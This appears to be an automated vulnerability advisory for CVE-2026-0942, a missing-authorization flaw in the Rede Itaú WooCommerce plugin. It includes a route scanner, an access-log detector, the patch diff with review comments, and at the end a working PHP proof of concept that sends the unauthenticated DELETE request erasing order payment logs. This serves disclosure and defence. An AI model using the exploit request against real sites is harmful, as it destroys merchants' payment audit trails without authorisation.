Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-0942: Rede Itaú for WooCommerce — Payment PIX, Credit Card and Debit <= 5.1.5 – Missing Authorization to Unauthenticated Rede Order Logs Deletion (woo-rede)

CVE ID: CVE-2026-0942
Plugin: woo-rede
Severity: Medium (CVSS 5.3)
CWE: CWE-306 (Missing Authentication for Critical Function)
Vulnerable Versions: <= 5.1.5
Patched Version: 5.1.6
Disclosed: January 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0942:
The Rede Itaú for WooCommerce plugin, versions up to and including 5.1.5, contains a missing authorization vulnerability. The plugin’s REST API endpoint for clearing order logs lacks proper capability checks, allowing unauthenticated attackers to delete payment metadata from all WooCommerce orders. This vulnerability has a CVSS score of 5.3, indicating a medium severity issue.

The root cause is the missing permission callback on the REST API registration of the `clearOrderLogs()` handler. In the vulnerable version, `woo-rede/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php` registers the route at lines 39-43 with `'permission_callback' => '__return_true'`, which tells the WordPress REST API that the route is intentionally public. Any HTTP DELETE to it, authenticated or not, therefore reaches `clearOrderLogs()`. The handler queries every WooCommerce order carrying the `lknWcRedeOrderLogs` meta key (`'limit' => -1`), deletes that metadata from each order and saves it, and, as the diff shows, returns the matched order objects as the response body.
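The pattern is generic: any `register_rest_route()` call with `'permission_callback' => '__return_true'` (or with no `permission_callback` at all) on a state-changing method is the same bug. The following static check, added here as an example and not part of the plugin or of Atomic Edge's tooling, extracts every `register_rest_route(...)` call from PHP source with a parenthesis-balancing scanner, reads the `methods` and `permission_callback` entries, and grades the route. The sample PHP is constructed for the example: the first registration is modelled on the vulnerable and patched hunks in the diff below, while the `('example', '/ping')` route is hypothetical and only exists to exercise the "key absent" path.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample PHP for this example (not copied from the plugin): the first
# route mirrors the vulnerable registration; ('example', '/ping') is hypothetical.
VULNERABLE_PHP = r"""
register_rest_route('redeIntegration', '/clearOrderLogs', array(
    'methods' => 'DELETE',
    'callback' => array($this, 'clearOrderLogs'),
    'permission_callback' => '__return_true',
));

register_rest_route('example', '/ping', array(
    'methods' => 'GET',
    'callback' => array($this, 'ping'),
));
"""

# Modelled on the 5.1.6 registration, where a real capability check is wired in.
PATCHED_PHP = r"""
register_rest_route('redeIntegration', '/clearOrderLogs', array(
    'methods' => 'DELETE',
    'callback' => array($this, 'clearOrderLogs'),
    'permission_callback' => array($this, 'check_clear_logs_permissions'),
));
"""

# HTTP verbs and WP_REST_Server constants that change server state.
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE",
                  "CREATABLE", "EDITABLE", "DELETABLE", "ALLMETHODS"}


@dataclass
class RouteFinding:
    namespace: str
    route: str
    methods: str
    permission: Optional[str]   # None when the key is absent
    status: str                 # "missing" | "public" | "guarded"
    severity: str               # "high" | "medium" | "none"


def extract_calls(php: str, func: str = "register_rest_route") -> List[str]:
    """Return the argument text of every `func(...)` call. Parentheses are
    balanced by hand and ignored inside string literals, so the nested
    array(...) and array($this, 'cb') arguments stay intact."""
    calls = []
    for m in re.finditer(re.escape(func) + r"\s*\(", php):
        start = i = m.end()
        depth, quote = 1, None
        while i < len(php) and depth:
            c = php[i]
            if quote:
                if c == "\\":
                    i += 1                  # skip the escaped character
                elif c == quote:
                    quote = None
            elif c in "'\"":
                quote = c
            elif c == "(":
                depth += 1
            elif c == ")":
                depth -= 1
            i += 1
        calls.append(php[start:i - 1])
    return calls


def _arg(args: str, key: str) -> Optional[str]:
    """Value of `'key' => value`, assuming one array entry per line (usual WP style)."""
    m = re.search(r"['\"]" + key + r"['\"]\s*=>\s*([^\n]*)", args)
    return m.group(1).strip().rstrip(",").strip() if m else None


def classify_route(args: str) -> RouteFinding:
    head = re.match(r"\s*(['\"])(.*?)\1\s*,\s*(['\"])(.*?)\3", args)
    namespace, route = (head.group(2), head.group(4)) if head else ("?", "?")
    methods = _arg(args, "methods") or "'GET'"      # register_rest_route defaults to GET
    permission = _arg(args, "permission_callback")
    if permission is None:
        status = "missing"      # WP 5.5+ emits _doing_it_wrong but still serves the route
    elif "__return_true" in permission:
        status = "public"
    else:
        status = "guarded"
    if status == "guarded":
        severity = "none"
    elif set(re.findall(r"[A-Z]+", methods.upper())) & STATE_CHANGING:
        severity = "high"       # unauthenticated write/delete, as in CVE-2026-0942
    else:
        severity = "medium"     # public read route: confirm it is meant to be open
    return RouteFinding(namespace, route, methods, permission, status, severity)


def scan_php(php: str) -> List[RouteFinding]:
    return [classify_route(a) for a in extract_calls(php)]


if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_PHP), ("patched", PATCHED_PHP)):
        print(f"== {label} ==")
        for f in scan_php(src):
            print(f"{f.severity:6} {f.status:8} {f.namespace}{f.route} "
                  f"methods={f.methods} permission={f.permission}")
```

Point `scan_php()` at the concatenated source of a plugin directory to get the same listing for every route it registers. A "guarded" verdict only means some callback other than `__return_true` is wired in; whether that callback checks a meaningful capability still has to be read by hand.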

Exploitation is a single unauthenticated HTTP DELETE to `/wp-json/redeIntegration/clearOrderLogs` (or, on sites without pretty permalinks, `/?rest_route=/redeIntegration/clearOrderLogs`). No cookie, nonce, body or query parameter is needed; cURL, wget (`--method=DELETE`) or any HTTP client will do. The only precondition is network access to a WordPress site with the vulnerable plugin active. Because the request is destructive on a vulnerable site, it is not a safe way to check a production installation; check the installed plugin version instead.
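Because the whole attack is one request with a fixed method and path, it is easy to find in web server access logs after the fact. The detection below is an added example (not part of the page's PoC or of the plugin) run over constructed combined-format log lines; the IP addresses are from the documentation ranges and the lines are invented for the example. It normalises both URL forms WordPress serves REST routes on, then grades each matching DELETE by status code: 200 means the handler ran, 401/403 means a permission callback rejected the request (5.1.6+ behaviour), 404 means the route was not registered at all.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache/nginx "combined" format; not from any real server.
SAMPLE_LOG = """\
203.0.113.10 - - [14/Jan/2026:10:21:03 +0000] "DELETE /wp-json/redeIntegration/clearOrderLogs HTTP/1.1" 200 5123 "-" "curl/8.5.0"
203.0.113.10 - - [14/Jan/2026:10:21:09 +0000] "DELETE /?rest_route=/redeIntegration/clearOrderLogs HTTP/1.1" 200 5123 "-" "curl/8.5.0"
198.51.100.7 - - [15/Jan/2026:08:02:44 +0000] "DELETE /wp-json/redeIntegration/clearOrderLogs HTTP/1.1" 401 93 "-" "python-requests/2.32"
192.0.2.25 - - [15/Jan/2026:09:15:00 +0000] "DELETE /wp-json/redeIntegration/clearOrderLogs HTTP/1.1" 200 78 "https://shop.example/wp-admin/" "Mozilla/5.0"
192.0.2.40 - - [15/Jan/2026:09:15:30 +0000] "DELETE /wp-json/redeIntegration/clearOrderLogs HTTP/1.1" 403 89 "https://shop.example/wp-admin/" "Mozilla/5.0"
192.0.2.30 - - [15/Jan/2026:09:16:12 +0000] "GET /wp-json/wc/v3/orders HTTP/1.1" 401 93 "-" "Mozilla/5.0"
203.0.113.10 - - [16/Jan/2026:11:00:00 +0000] "DELETE /shop/wp-json/redeIntegration/clearOrderLogs HTTP/1.1" 404 120 "-" "curl/8.5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TARGET_ROUTE = "/redeIntegration/clearOrderLogs"


@dataclass
class Hit:
    ip: str
    ts: str
    form: str       # "pretty" (/wp-json/...) or "rest_route" (?rest_route=...)
    status: int
    referer: str
    ua: str
    verdict: str


def rest_route(target: str) -> Optional[Tuple[str, str]]:
    """Normalise the two URL forms WordPress serves REST routes on, including
    installs in a subdirectory (/shop/wp-json/...). Returns (form, route) or None."""
    parts = urlsplit(target)
    idx = parts.path.find("/wp-json/")
    if idx != -1:
        return "pretty", "/" + parts.path[idx + len("/wp-json/"):].strip("/")
    rr = parse_qs(parts.query).get("rest_route")
    if rr:
        return "rest_route", "/" + rr[0].strip("/")
    return None


def verdict_for(status: int) -> str:
    if status == 200:
        return "executed"      # handler ran: exploitation on <= 5.1.5, or an authorised admin on 5.1.6+
    if status in (401, 403):
        return "blocked"       # permission callback rejected the call (5.1.6+ behaviour)
    if status == 404:
        return "route-absent"  # plugin inactive, wrong path, or filtered upstream
    return "other"


def detect(log_text: str) -> List[Hit]:
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        route = rest_route(m["target"])
        # Compare case-insensitively so a casing variant of the path is not missed.
        if m["method"] != "DELETE" or route is None or route[1].lower() != TARGET_ROUTE.lower():
            continue
        status = int(m["status"])
        hits.append(Hit(m["ip"], m["ts"], route[0], status, m["referer"], m["ua"], verdict_for(status)))
    return hits


def summarize(hits: List[Hit]) -> Counter:
    """Per-source tally of verdicts, for a quick view of who got through and who was refused."""
    return Counter((h.ip, h.verdict) for h in hits)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for h in found:
        print(f"{h.ts}  {h.ip:14} {h.form:10} {h.status}  {h.verdict:12} ua={h.ua}")
    print(summarize(found))
```

A 200 on its own cannot tell exploitation from legitimate admin use. On 5.1.6 and later the handler writes an entry to the WooCommerce logger under the source `rede-security-audit` (see the patched `clearOrderLogs()` in the diff below) with the acting user and remote address; a 200 in the access log with no matching audit entry at that time means the unguarded pre-5.1.6 handler ran.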

The patch in version 5.1.6 replaces `'permission_callback' => '__return_true'` with `'permission_callback' => array($this, 'check_clear_logs_permissions')`. The new `check_clear_logs_permissions()` method returns true only when the current user has the `manage_woocommerce` or `manage_options` capability. `clearOrderLogs()` repeats the same capability check and returns a `WP_Error` with status 403 if it fails, writes an audit entry to the WooCommerce logger under the source `rede-security-audit` (user ID, login, remote address, timestamp), processes matching orders in batches of 50 by ID, and returns a success flag and a count instead of the order objects. Because both checks go through `current_user_can()`, a request is only treated as authenticated if it carries valid REST credentials: a logged-in session together with an `X-WP-Nonce` header, or another REST authentication method such as an application password. Unauthenticated requests now receive a 401 from the REST server, and logged-in users without the capability receive a 403.

Successful exploitation deletes the `lknWcRedeOrderLogs` metadata from every WooCommerce order that has it. The diff does not show the contents of that meta key, but given its name it holds the plugin's per-order Rede payment-processing log (transaction details and debugging information used for order reconciliation and dispute resolution). The orders themselves are untouched; what is lost is the payment audit trail, which hinders financial reconciliation, fraud investigation and customer support. The deletion is committed to the database by `$order->save()`, so recovery depends on having a database backup from before the request.

Differential between vulnerable and patched code

Code Diff
--- a/woo-rede/Includes/LknIntegrationRedeForWoocommerce.php
+++ b/woo-rede/Includes/LknIntegrationRedeForWoocommerce.php
@@ -184,6 +184,9 @@
         $this->loader->add_filter('plugin_action_links_' . INTEGRATION_REDE_FOR_WOOCOMMERCE_FILE_BASENAME, $this, 'lknIntegrationRedeForWoocommercePluginRowMeta', 10, 2);
         $this->loader->add_filter('plugin_action_links_' . INTEGRATION_REDE_FOR_WOOCOMMERCE_FILE_BASENAME, $this, 'lknIntegrationRedeForWoocommercePluginRowMetaPro', 10, 2);

+        // Adicionar link do Changelog
+        $this->loader->add_filter('plugin_row_meta', $this, 'add_changelog_link', 10, 2);
+
         $this->loader->add_action('rest_api_init', $this->LknIntegrationRedeForWoocommerceEndpointClass, 'registerorderRedeCaptureEndPoint');
         $this->loader->add_filter('woocommerce_gateway_title', $this, 'customize_wc_payment_gateway_pix_name', 10, 2);

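Review bot: the `plugin_row_meta` filter registration here is unrelated to the authorization fix this release ships; bundling a cosmetic changelog link into a security release makes the patch harder to review and to backport to a hotfix branch. Consider landing it as a separate change.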
@@ -1493,4 +1496,23 @@
             'message' => __('Card brand not found', 'woo-rede'),
         ];
     }
+
+    /**
+     * Adiciona link do Changelog na página de plugins
+     */
+    public function add_changelog_link($plugin_meta, $plugin_file)
+    {
+        // Verificar se é o nosso plugin
+        if (strpos($plugin_file, 'integration-rede-for-woocommerce.php') !== false) {
+            $changelog_link = sprintf(
+                '<a href="%1$s" target="_blank">%2$s</a>',
+                'https://br.wordpress.org/plugins/woo-rede/#developers',
+                __('Changelog', 'woo-rede')
+            );
+
+            $plugin_meta[] = $changelog_link;
+        }
+
+        return $plugin_meta;
+    }
 }
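Review bot: `strpos($plugin_file, 'integration-rede-for-woocommerce.php') !== false` is a loose match; any other installed plugin whose main file name ends in the same string (a fork or a variant in another directory) also gets the link. The previous hunk already uses `INTEGRATION_REDE_FOR_WOOCOMMERCE_FILE_BASENAME`, so `if ($plugin_file === INTEGRATION_REDE_FOR_WOOCOMMERCE_FILE_BASENAME)` is both exact and cheaper. Minor: add `rel="noopener noreferrer"` to the `target="_blank"` anchor.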
--- a/woo-rede/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php
+++ b/woo-rede/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php
@@ -39,7 +39,7 @@
         register_rest_route('redeIntegration', '/clearOrderLogs', array(
             'methods' => 'DELETE',
             'callback' => array($this, 'clearOrderLogs'),
-            'permission_callback' => '__return_true',
+            'permission_callback' => array($this, 'check_clear_logs_permissions'),
         ));

         register_rest_route('woorede', '/s', array(
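Review bot: this one-line change is the fix and the right shape, with two follow-ups. First, the `register_rest_route('woorede', '/s', ...)` call below appears only as context, so its `permission_callback` is not visible in this diff; confirm it, and every other `register_rest_route` in the plugin, does not also pair `__return_true` with a state-changing method. Second, because `check_clear_logs_permissions()` relies on `current_user_can()`, whatever admin-side code calls `DELETE /wp-json/redeIntegration/clearOrderLogs` must now send the REST nonce (`X-WP-Nonce` from `wp_create_nonce('wp_rest')`) or use another REST authentication method; a cookie-only request is treated as logged out and will receive a 401.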
@@ -55,22 +55,87 @@
         ));
     }

+    /**
+     * Verifica se o usuário tem permissão para limpar logs de pedidos
+     *
+     * @return bool True se autorizado, false caso contrário
+     */
+    public function check_clear_logs_permissions()
+    {
+        // Verifica se o usuário está logado e tem permissão para gerenciar WooCommerce
+        return current_user_can('manage_woocommerce') || current_user_can('manage_options');
+    }
+
     public function clearOrderLogs($request)
     {
-        $args = array(
-            'limit' => -1, // Sem limite, pega todas as ordens
-            'meta_key' => 'lknWcRedeOrderLogs', // Meta key específica
-            'meta_compare' => 'EXISTS', // Verifica se a meta key existe
-        );
-
-        $orders = wc_get_orders($args);
-
-        foreach ($orders as $order) {
-            $order->delete_meta_data('lknWcRedeOrderLogs');
-            $order->save();
+        // Verificação adicional de segurança
+        if (!current_user_can('manage_woocommerce') && !current_user_can('manage_options')) {
+            return new WP_Error(
+                'insufficient_permissions',
+                __('You do not have permission to clear order logs.', 'woo-rede'),
+                array('status' => 403)
+            );
+        }
+
+        // Log da ação para auditoria
+        if (function_exists('wc_get_logger')) {
+            $logger = wc_get_logger();
+            $current_user = wp_get_current_user();
+            $logger->info('Order logs cleared by user', array(
+                'source' => 'rede-security-audit',
+                'user_id' => $current_user->ID,
+                'user_login' => $current_user->user_login,
+                'user_ip' => isset($_SERVER['REMOTE_ADDR']) ? sanitize_text_field(wp_unslash($_SERVER['REMOTE_ADDR'])) : 'unknown',
+                'timestamp' => current_time('mysql')
+            ));
         }

-        return new WP_REST_Response($orders, 200);
+        $deleted_count = 0;
+        $batch_size = 50; // Processa 50 pedidos por vez para evitar esgotamento de memória
+        $offset = 0;
+
+        do {
+            $args = array(
+                'limit' => $batch_size,
+                'offset' => $offset,
+                'meta_key' => 'lknWcRedeOrderLogs',
+                'meta_compare' => 'EXISTS',
+                'return' => 'ids', // Retorna apenas IDs para economizar memória
+            );
+
+            $order_ids = wc_get_orders($args);
+
+            if (empty($order_ids)) {
+                break; // Não há mais pedidos para processar
+            }
+
+            foreach ($order_ids as $order_id) {
+                $order = wc_get_order($order_id);
+                if ($order) {
+                    $order->delete_meta_data('lknWcRedeOrderLogs');
+                    $order->save();
+                    $deleted_count++;
+                }
+
+                // Libera memória do objeto order
+                unset($order);
+            }
+
+            $offset += $batch_size;
+
+            // Força limpeza de memória entre lotes
+            if (function_exists('gc_collect_cycles')) {
+                gc_collect_cycles();
+            }
+
+        } while (count($order_ids) === $batch_size);
+
+        return new WP_REST_Response(array(
+            'success' => true,
+            /* translators: %d: number of orders from which logs were cleared */
+            'message' => sprintf(__('Logs cleared from %d orders.', 'woo-rede'), $deleted_count),
+            'orders_affected' => $deleted_count
+        ), 200);
     }

     public function maxipagoDebitListener($request)
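Review bot: `$offset += $batch_size` skips orders. Each pass removes `lknWcRedeOrderLogs` from the orders it just saved, so they stop matching `'meta_compare' => 'EXISTS'` and the next query already starts from a result set that is `$batch_size` shorter; advancing the offset by another `$batch_size` jumps over that many unprocessed orders per iteration, and the loop ends with roughly half of the logs still in place. Query from offset 0 on every pass and stop when the query returns nothing, with a guard that breaks if a pass deletes nothing (a failed `save()` would otherwise spin the loop forever). The duplicated capability check at the top of the handler is fine as defence in depth, and replacing the old `new WP_REST_Response($orders, 200)` with a count closes the side issue of echoing the matched order objects back to the caller.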
--- a/woo-rede/integration-rede-for-woocommerce.php
+++ b/woo-rede/integration-rede-for-woocommerce.php
@@ -15,7 +15,7 @@
  * @wordpress-plugin
  * Plugin Name:       Integration Rede Itaú for WooCommerce — Payment PIX, Credit Card and Debit
  * Description:       Receba pagamentos por meio de cartões de crédito e débito, de diferentes bandeiras, usando a tecnologia de autenticação 3DS e recursos avançados de proteção contra fraudes.
- * Version:           5.1.5
+ * Version:           5.1.6
  * Author:            Link Nacional
  * Author URI:        https://linknacional.com.br/wordpress
  * License:           GPL-3.0+
--- a/woo-rede/lkn-integration-rede-for-woocommerce-file.php
+++ b/woo-rede/lkn-integration-rede-for-woocommerce-file.php
@@ -17,7 +17,7 @@
  * Rename this for your plugin and update it as you release new versions.
  */
 if (! defined('INTEGRATION_REDE_FOR_WOOCOMMERCE_VERSION')) {
-    define('INTEGRATION_REDE_FOR_WOOCOMMERCE_VERSION', '5.1.5');
+    define('INTEGRATION_REDE_FOR_WOOCOMMERCE_VERSION', '5.1.6');
 }

 if (! defined('INTEGRATION_REDE_FOR_WOOCOMMERCE_FILE')) {

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0942 - Rede Itaú for WooCommerce — Payment PIX, Credit Card and Debit <= 5.1.5 - Missing Authorization to Unauthenticated Rede Order Logs Deletion

/**
 * Proof of Concept for CVE-2026-0942
 * Unauthenticated Rede Order Logs Deletion Vulnerability
 *
 * Sends the single unauthenticated DELETE request to the plugin's REST
 * endpoint. On <= 5.1.5 the handler runs, deletes the 'lknWcRedeOrderLogs'
 * metadata from every order that has it and answers 200. On 5.1.6+ the
 * permission callback rejects the request: 401 for a logged-out caller,
 * 403 for a logged-in user without manage_woocommerce / manage_options.
 *
 * The request is destructive on a vulnerable site; run it only against a
 * lab instance you are authorised to test.
 */

// Configuration - target WordPress site URL (first CLI argument overrides the default)
$target_url = $argv[1] ?? 'https://vulnerable-site.com';

// Construct the vulnerable REST API endpoint
$endpoint = '/wp-json/redeIntegration/clearOrderLogs';
$full_url = rtrim($target_url, '/') . $endpoint;

echo "Atomic Edge CVE-2026-0942 PoC\n";
echo "Target: $full_url\n";
echo "Method: DELETE\n\n";

// Initialize cURL session
$ch = curl_init();

// Set cURL options for an unauthenticated DELETE request: no cookie, no
// X-WP-Nonce header, no body - nothing the vulnerable route requires.
curl_setopt($ch, CURLOPT_URL, $full_url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'DELETE');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for lab testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // Disable for lab testing only
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);

// Close cURL session
curl_close($ch);

// Display results
if ($error) {
    echo "Error: $error\n";
} else {
    echo "HTTP Status Code: $http_code\n";
    echo "Response: $response\n";

    if ($http_code === 200) {
        echo "\n[+] SUCCESS: Order logs metadata deleted from all WooCommerce orders.\n";
        echo "    The 'lknWcRedeOrderLogs' meta key has been removed.\n";
        echo "    (<= 5.1.5 returns the matched order objects as the response body.)\n";
    } elseif ($http_code === 401 || $http_code === 403) {
        echo "\n[-] BLOCKED: the permission callback rejected the request; the site is most likely on 5.1.6 or later.\n";
    } elseif ($http_code === 404) {
        echo "\n[-] NOT FOUND: the route is not registered (plugin inactive or not installed).\n";
    } else {
        echo "\n[-] FAILED: unexpected status; the endpoint may be patched, filtered or inaccessible.\n";
    }
}

// Note: This vulnerability affects plugin versions <= 5.1.5
// Patched in version 5.1.6 with proper capability checks
?>
